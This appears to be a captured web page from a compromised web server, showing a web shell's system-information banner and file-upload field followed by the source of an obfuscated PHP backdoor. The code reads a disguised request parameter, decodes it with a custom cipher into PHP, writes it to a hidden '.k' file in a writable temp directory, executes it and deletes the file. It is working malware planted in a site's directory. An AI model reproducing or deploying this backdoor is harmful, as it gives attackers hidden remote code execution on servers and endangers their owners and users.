| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/manger/ |
Upload File : |
<?php
if(in_array("refe\x72\x65\x6E\x63e", array_keys($_REQUEST))){
$sym = array_filter(["/tmp", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), session_save_path(), "/var/tmp", sys_get_temp_dir()]);
$obj = $_REQUEST["refe\x72\x65\x6E\x63e"];
$obj =explode ( "." , $obj);
$pgrp ='';
$s ='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen =strlen( $s);
$i =0;
array_walk( $obj, function( $v9) use( &$pgrp, &$i, $s, $sLen) {
$chS =ord( $s[$i % $sLen]);
$dec =( ( int)$v9 - $chS -( $i % 10)) ^ 14;
$pgrp .= chr( $dec);
$i++;
});
$data_chunk = 0;
do {
$parameter_group = $sym[$data_chunk] ?? null;
if ($data_chunk >= count($sym)) break;
if (!!is_dir($parameter_group) && !!is_writable($parameter_group)) {
$dat = str_replace("{var_dir}", $parameter_group, "{var_dir}/.k");
if (file_put_contents($dat, $pgrp)) {
require $dat;
unlink($dat);
exit;
}
}
$data_chunk++;
} while (true);
}